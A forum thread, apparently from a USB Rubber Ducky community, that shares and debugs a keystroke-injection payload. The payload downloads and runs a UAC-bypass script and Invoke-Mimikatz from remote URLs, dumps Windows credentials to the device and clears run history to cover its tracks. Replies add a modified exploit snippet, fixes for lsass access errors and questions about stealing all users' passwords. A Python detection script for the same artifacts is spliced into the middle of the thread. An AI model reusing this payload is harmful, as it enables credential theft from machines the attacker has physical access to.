linuxbman Posted September 19, 2016

Hi all, I've been playing with the ducky for some time, figured it was time to give back to the community. I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer. The only issue I am having is that when it does the UAC Bypass it does not recognize the exit after, so there is still a small window present. I suspect it is because the exploit pops the new window up, and likely there is nothing I can do. Hopefully someone can figure it out. Otherwise it works pretty nice. Feel free to clean it up and make it better.

REM open cmd and set drive letter
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1
ENTER
DELAY 1000
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm'); Bypass-UAC -Method ucmDismMethod; exit;"
ENTER
DELAY 1000
REM Shrink windows
STRING mode CON: COLS=15 LINES=1
ENTER
REM get Ducky Drive letter
STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'}
ENTER
DELAY 500
REM Run Mimikatz and dump to ducky in file named after computer
STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt");
ENTER
DELAY 1000
STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit
ENTER
Guest Posted September 19, 2016

This looks awesome! Once I get one for myself I will definitely try it ^^
anode Posted September 19, 2016

Only did a quick skim, but what window stays alive? CMD? If 'exit' doesn't work, try adding an ALT-F4.
Denny Posted September 21, 2016

When I rerun this on the same PC, it asks if I want to replace the files. Can you fix this?
zacharygriffee Posted September 22, 2016

Question: I'm also getting the 'replace files' dialog after the second application of this payload. I'm attempting to get rid of that 'replace files' dialog by modifying the ps1 script and putting the modified version on my web server. Since I didn't check prior to using the hack on my personal computer, the question I have is, does 'dismcore.dll' exist prior to applying this hack? Or does this hack create/spawn 'dismcore.dll' as a new dll for the system? The reason being, how I'm modifying the ps1 is that it assumes there is no dismcore.dll before the hack is applied.
zacharygriffee Posted September 22, 2016

# Exploit logic
if (Test-Path $($env:SystemRoot + '\System32\dismcore.dll')) {
    echo "[!] Already Have dismcore.dll, not moving file."
} else {
    echo "[>] Performing elevated IFileOperation::MoveItem operation.."
    $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\System32\'), "dismcore.dll")
    $IFileOperation.PerformOperations()
}

At about line 1383 I just modded the ps1 at https://goo.gl/fPl4tm to what's in the code block.
personofinterest Posted September 23, 2016

Worked on something similar to this tonight. Going to exfil and then post it.
MrMoi Posted September 26, 2016

Does nobody get this error in the txt file?

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

Quote:
Without rights to access lsass process, all commands will fail with an error like this:
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
(except when working with a minidump). So, do not hesitate to start with:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK
...before others commands
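From the defender's side, the payload in the first post and the lsass access behind MrMoi's error leave four traces that endpoint telemetry can catch: a PowerShell IEX/DownloadString cradle, dismcore.dll appearing directly in System32, a handle to lsass.exe from a process that has no business opening it, and RunMRU values being deleted. The Python below is an added example, not code from this thread or from any of the tools it mentions; the Sysmon-style field names, the lsass allowlist and every sample value are assumptions constructed for the demonstration.

```python
import re

# Constructed Sysmon-style events (assumption: keys follow Sysmon's ProcessCreate (1),
# ProcessAccess (10), FileCreate (11) and RegistryEvent (12) schemas; every value is made up).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS,
     "CommandLine": "powershell \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1'); exit;\""},
    {"EventID": 11, "Image": r"C:\Windows\System32\dllhost.exe",
     "TargetFilename": r"C:\Windows\System32\dismcore.dll"},
    {"EventID": 10, "SourceImage": PS,
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 12, "Image": PS, "EventType": "DeleteValue",
     "TargetObject": r"HKU\S-1-5-21-1-1-1-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},  # benign
]

# Processes expected to open lsass.exe (assumption: tune this list per environment).
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
# In-memory download-and-run cradle: IEX together with DownloadString, in either order, any case.
CRADLE = re.compile(r"\bIEX\b.*DownloadString|DownloadString.*\bIEX\b", re.I)


def basename(path):
    """Last path component, lower-cased, for image comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, responsible_image) pairs, one per event that matches a rule."""
    hits = []
    for e in events:
        eid = e.get("EventID")
        if eid == 1 and CRADLE.search(e.get("CommandLine", "")):
            hits.append(("powershell_download_cradle", e.get("Image", "")))
        elif eid == 11 and e.get("TargetFilename", "").lower().endswith(r"\system32\dismcore.dll"):
            # The genuine DismCore.dll lives under System32\Dism; a copy placed directly in
            # System32 is the hijack artifact this thread's UAC bypass leaves behind.
            hits.append(("dismcore_dll_dropped_in_system32", e.get("Image", "")))
        elif (eid == 10 and basename(e.get("TargetImage", "")) == "lsass.exe"
              and basename(e.get("SourceImage", "")) not in LSASS_ALLOWLIST):
            hits.append(("lsass_handle_from_unexpected_process", e.get("SourceImage", "")))
        elif (eid == 12 and e.get("EventType") == "DeleteValue"
              and r"\explorer\runmru" in e.get("TargetObject", "").lower()):
            hits.append(("runmru_history_cleared", e.get("Image", "")))
    return hits


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:40s} {image}")
```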
th3count Posted September 28, 2016

On 9/26/2016 at 6:03 AM, MrMoi said:
Does nobody get this error in the txt file? mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

I got it as well. I tried throwing those 2 commands first thing after the comments in mimikatz; it ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution.

*Windows 10 x64 - 1607
th3count Posted September 28, 2016

1 hour ago, th3count said:
I got it as well. I tried throwing those 2 commands first thing after the comments in mimikatz; it ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution. *Windows 10 x64 - 1607

I got it to run by executing the new version manually in the command line. The version on the Google link is 2.0; the new version is 2.1. Maybe this?
soarece Posted October 12, 2016

Hello, how to run mimikatz on RDP? Thank you
Ghostshell Posted October 13, 2016 (edited)

Just copying and pasting the code, encoding it and putting it on my ducky, I keep getting a replace file prompt on my Win7 machine and the script never fully finishes. The prompt is from the bypass UAC section.

Edited October 13, 2016 by Ghostshell
soarece Posted September 10, 2017

"just copying and pasting the code, encoding it and putting on my ducky" ok.. but how to do this?? I don't see the USB rubber connected to the PC.
Exmix Posted September 10, 2017

On 9/26/2016 at 8:03 AM, MrMoi said:
Does nobody get this error in the txt file? mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

On 9/27/2016 at 11:08 PM, th3count said:
I got it as well. I tried throwing those 2 commands first thing after the comments in mimikatz; it ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution. *Windows 10 x64 - 1607

On 9/28/2016 at 0:57 AM, th3count said:
I got it to run by executing the new version manually in the command line. The version on the Google link is 2.0; the new version is 2.1. Maybe this?

When I was working with this, I found it SEEMS to be an issue with Windows 10. I got it to work on Win7 with no issues, but when I tried it on 5-6 various Win10 machines I always got that output. Been looking for a fix for that.
soarece Posted September 20, 2017

Hello, I see mimikatz decrypts the password only for the active user. If on the same PC there are more users with different passwords, how can we use mimikatz to decrypt the passwords for all of them? Thank you